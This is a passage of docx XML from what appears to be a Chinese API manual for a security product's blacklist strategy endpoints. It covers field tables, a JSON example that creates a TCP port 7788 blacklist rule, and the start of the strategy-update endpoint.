          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DCAC4F5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>源IP搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0B9528C1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38543CB7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayPort</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12A9FB3F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E184D4C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="255A12EF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>端口搜索字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="03BFD433" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="744923FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>switchStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34F6A3BC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="74F442D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59B4AF8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开关状态，0：关闭，1：打开</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="713C546F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IpRange</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4511442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2801119" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="761CBFC6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47F60B03" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0C688FA1" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="426FC895" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>startIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="556EDC1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18FF122A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开始ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47FCFA21" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="225ADA13" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>endIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="126CC26D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="716B99ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>结束ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4F14A685" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664510AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"strategyName": "新建黑名单-20220606164812",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"remark": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"ports": ["7788"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"protos": ["TCP"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"displayPort": "7788",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"switchStatus": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstTagIds": ["all"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstGroupIds": [9],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"dstRealmType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcTagIds": ["629d90ceba7f06736d40f5a5", "629d90c6ba7f06736d40f5a4"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcGroupIds": [2],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"srcRealmType": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029DF7A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01324844" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010B0B96"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="17F510E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FC82A6B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D1002AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A436E8E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="67501895" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F966D86" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38F46DF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="142B9717" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5B455F90" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06CBF40F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="595E9473" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C71F80A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2824904B" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F6FFF8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56AB1E02" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DAB1A80" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DC06763" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54"/>
    <w:p w14:paraId="794B0825" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="修改策略"/>
      <w:bookmarkEnd w:id="228"/>
      <w:r>
        <w:t>修改策略</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8462B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CBAFEA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/ms-srv/api/black-strategy/update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C288F01"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563"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="5666"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="12D1468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B0301E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D6C4A49" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E6AD737" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13CF4D33" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3A19E43E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="018AF725" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B37FAF7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DA3BC3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D791B52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="334BA205" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0E55F4FE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>strategyName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12A47F48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BB399D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4420A44B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>策略名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="12AEC0A4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77936C4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstRealmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DAF1260" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7060DA7E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EAB0A16" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问者范围，1:业务组、标签，2:自定义主机，3：自定义ip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="45584A2D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55211477" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstGroups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="711AFE9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33A6774C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="143B632C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="24390F9D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67228D37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstTags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33907443" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="47C8FCCA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0496B20B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问主机标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2AA55EDF" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C18B5AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>dstIpRanges</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1AFE9E2B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="350695D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58AE1D42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问者ip范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="33A7E576" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25354816" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>dstAgentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="081B3AE1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17AE76C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B0F43C7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>被访问自定义主机范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="57205488" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4B1AB43C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>srcRealmType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A814FDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE1CAF8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A346555" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
